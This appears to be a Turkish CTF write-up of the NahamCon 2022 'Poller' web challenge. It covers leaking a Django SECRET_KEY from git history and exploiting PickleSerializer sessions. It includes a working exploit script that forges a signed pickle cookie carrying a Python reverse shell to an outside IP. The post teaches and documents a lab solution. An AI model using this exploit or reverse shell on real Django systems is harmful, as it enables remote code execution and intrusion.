---
layout: post
title: "Nahamcon 2022 Web Soruları - Poller"
tags: [ctf, nahamcon, web]
---

![](/assets/img/ctf/nahamcon2022/poller/banner_poller.png)

CTF Linki: [https://ctf.nahamcon.com/challenges](https://ctf.nahamcon.com/challenges)

**Kategori:** Insecure Serializer

TLDR; Zafiyetli serializer modülü içeren Django uygulaması var. PickleSerializer modülü kullanılarak reverse shell elde ediliyor. Bu sayede flag okunabiliyor.

## Adimlar

Uygulamaya giriş yapıldığında bizi aşağıdaki login ekranı karşılıyor. Elimizde kullanıcı adı ve parola yok. Sağ taraftaki Sign Up butonundan kayıt oluyoruz.

![01](/assets/img/ctf/nahamcon2022/poller/poller-01.png)

Giriş yaptıktan sonraki ekran ise bu şekilde.

![02](/assets/img/ctf/nahamcon2022/poller/poller-02.png)

Uygulamanın işleyişini anlamaya çalıştım. Kaynak kodunu incelerken bir git reposu buldum.

![03](/assets/img/ctf/nahamcon2022/poller/poller-03.png)

Repoyu incelediğimde Django uygulaması olduğunu anladım. Commit geçmişine baktığımda da SECRET_KEY'i buldum.

![04](/assets/img/ctf/nahamcon2022/poller/poller-04.png)

Elimde bir adet secret key var. Uygulamada debug mode açık değil. Başka işe yarar bir seyler daha bulmam gerekiyor. Settingse baktığımda ise Serializer olarak PickleSerializer'ın kullanıldığını gördüm.

![05](/assets/img/ctf/nahamcon2022/poller/poller-05.png)

Biraz araştırdıktan sonra aşağıdaki exploiti buldum ve düzenledim. [[1](https://systemoverlord.com/2014/04/14/plaidctf-2014-reekeeeee/)]

```python
import requests as req
import subprocess
import pickle
from django.core import signing
from django.contrib.sessions.serializers import PickleSerializer

SECRET_KEY = "77m6p#v&(wk_s2+n5na-bqe!m)^zu)9typ#0c&@qd%8o6!"

class Exploit(object):
  def __reduce__(self):
    return (subprocess.Popen, (
      ("""python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("159.89.17.34",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' &"""),0,None,None,None,None,None,False,True,))

# pickle.loads(pickle.dumps(Exploit()))

sesssss = signing.dumps(Exploit(), key=SECRET_KEY, salt='django.contrib.sessions.backends.signed_cookies',serializer=PickleSerializer,
compress=True)

resp = req.get('http://challenge.nahamcon.com:30880/', headers={"Cookie":'sessionid=%s'%sesssss})
print(resp.headers)
```

VPSden de, gelecek olan bağlantıyı dinlemeye başladım.

Boom.

![06](/assets/img/ctf/nahamcon2022/poller/poller-06.png)

**FLAG:** `flag{a6b902e045b669148b5e92f771a68d39}`

**References**
- [1] <https://systemoverlord.com/2014/04/14/plaidctf-2014-reekeeeee/>
